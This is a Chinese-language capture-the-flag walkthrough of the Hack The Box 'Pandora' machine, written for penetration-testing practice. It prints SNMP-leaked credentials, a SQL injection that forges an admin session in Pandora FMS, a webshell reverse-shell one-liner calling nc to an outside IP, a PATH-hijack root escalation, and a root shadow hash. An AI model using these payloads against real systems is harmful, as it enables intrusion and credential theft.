基本信息
端口扫描 22和80:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ nmap -sC -sV 10.10.11.136 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 10:33 CST Nmap scan report for 10.10.11.136 Host is up (0.067s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA) | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA) |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Play | Landing |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.88 seconds
80
UDP端口扫描 tcp的80没什么东西,尝试UDP扫描,发现161 snmp端口:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 $ sudo nmap -sU -sC -sV 10.10.11.136 Password: Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 10:36 CST Nmap scan report for 10.10.11.136 Host is up (0.079s latency). Not shown: 999 closed udp ports (port-unreach) Bug in snmp-win32-software: no string output. PORT STATE SERVICE VERSION 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 10.10.11.136:22 10.10.14.9:63085 | TCP 10.10.11.136:46700 1.1.1.1:53 | TCP 127.0.0.1:3306 0.0.0.0:0 | TCP 127.0.0.53:53 0.0.0.0:0 | UDP 0.0.0.0:161 *:* |_ UDP 127.0.0.53:53 *:* | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 48fa95537765c36000000000 | snmpEngineBoots: 30 |_ snmpEngineTime: 11h38m36s | snmp-interfaces: | lo | IP address: 127.0.0.1 Netmask: 255.0.0.0 | Type: softwareLoopback Speed: 10 Mbps | VMware VMXNET3 Ethernet Controller | IP address: 10.10.11.136 Netmask: 255.255.254.0 | MAC address: 00:50:56:b9:92:25 (VMware) |_ Type: ethernetCsmacd Speed: 4 Gbps | snmp-processes: | 1: | 2: | 3: | 4: | 6: | 9: | 10: | 11: | 12: | 13: | 14: | 15: | 16: | 17: | 18: | 20: | 21: | 22: | 23: | 24: | 25: | 26: | 27: | 28: | 29: | 30: | 77: | 78: | 79: |_ 80: | snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 |_ System uptime: 11h38m36.31s (4191631 timeticks) Service Info: Host: pandora Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1036.43 seconds
SNMP snmp枚举可以发现一组账号密码:
1 2 3 4 5 6 perl snmpbw.pl 10.10.11.136 public 2 1 perl snmpprs.pl 10.10.11.136.snmp snmpwalk -v 2c -c public 10.10.11.136 1.3.6.1.2.1.25.4.2.1.5 -u daniel -p HotelBabylon23
daniel 得到的daniel登录ssh:
信息 发现本地开着一个pandora_console:
pandora_console 转发出来访问,v7.0NG.742_FIX_PERL2020:
1 ssh -L 8888:localhost:80 daniel@10.10.11.136
搜到两个漏洞:
所以应该是两个结合利用,sql注入进后台,然后上传php webshell
sql injection 根据文章分析就是chart_generator.php中的session_id导致的,文章没给详细poc,可以直接暴力dump session表,其中得到结构信息,根据结构构造出admin的data,注入伪造admin:
1 2 3 4 5 6 7 8 sqlmap -u http://127.0.0.1:8888/pandora_console/include/chart_generator.php\?session_id\=1 -v 3 -D pandora -T tsessions_php --dump | g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 | http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO SELECT * FROM tsessions_php WHERE `id_session` = '' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO LIMIT 1
webshell admin有文件上传功能,上传webshell:
reverse shell & user flag 1 http://127.0.0.1:8888/pandora_console/images/shell.php?cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.9%204444%20%3E/tmp/f
提权信息 suid程序,内部调用tar,没有指定绝对路径:
提权 & root flag 首先写公钥到matt,ssh登录,后面操作的上下文都是在matt的ssh环境下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 matt@pandora:/tmp$ mkdir nya matt@pandora:/tmp$ cd nya matt@pandora:/tmp/nya$ ls matt@pandora:/tmp/nya$ echo "/bin/sh" > tar matt@pandora:/tmp/nya$ chmod +x ./tar matt@pandora:/tmp/nya$ export PATH=$(pwd):$PATH matt@pandora:/tmp/nya$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client # id uid=0(root) gid=1000(matt) groups=1000(matt) # cd /root # ls root.txt # cat root.txt ebb61c8c6de683f0d5c4778f2ee66826 # cat /etc/shadow root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::
参考资料
Last updated: 2022-05-23 14:46:41
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会